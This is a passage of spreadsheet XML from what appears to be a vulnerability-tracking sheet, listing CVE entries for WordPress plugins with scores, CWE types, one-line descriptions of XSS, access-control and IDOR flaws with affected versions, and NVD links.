      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Simply Schedule Appointments &lt;= 1.6.12.29 versions.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94074</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94077</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Safe SVG &lt;= 2.5.0 versions.</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94077</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94674</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Pixel Manager for WooCommerce &lt;= 1.69.0 versions.</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94674</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96338</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in Profile Builder &lt;= 4.0.2 versions.</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96338</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96347</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t>Subscriber Insecure Direct Object References (IDOR) in Bookly &lt;= 28.2 versions.</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96347</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96829</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="inlineStr"/>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in The Plus Addons for Elementor Page Builder Lite &lt;= 6.5.1 versions.</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96829</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96834</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="inlineStr"/>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>Subscriber Sensitive Data Exposure in GiveWP &lt;= 4.16.9 versions.</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96834</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96835</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in King Addons for Elementor &lt;= 51.1.85 versions.</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96835</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97067</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in EWWW Image Optimizer &lt;= 8.7.7 versions.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97067</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97236</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="inlineStr"/>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in ThemeREX Addons &lt; 2.45.0 versions.</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97236</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97239</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="inlineStr"/>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in MCP Content Manager Lite &lt;= 1.1.0 versions.</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97239</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97247</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S414" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Blocksy Companion &lt;= 2.1.55 versions.</t>
        </is>
      </c>
      <c r="T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97247</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97262</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Visual Composer Website Builder &lt;= 45.16.2 versions.</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97262</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97265</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock. Jetimpex Inc. JetEngine allows Stored XSS.
This issue affects JetEngine: from n/a through 3.8.15.3.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97265</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97266</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Virtue/Ascend/Pinnacle Toolkit &lt;= 4.9.12.1 versions.</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97266</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97270</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in CMB2 &lt;= 2.13.0 versions.</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97270</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97279</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="inlineStr"/>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Polylang &lt;= 3.8.9 versions.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97279</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97286</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S420" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Strong Testimonials &lt;= 3.3.11 versions.</t>
        </is>
      </c>
      <c r="T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97286</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
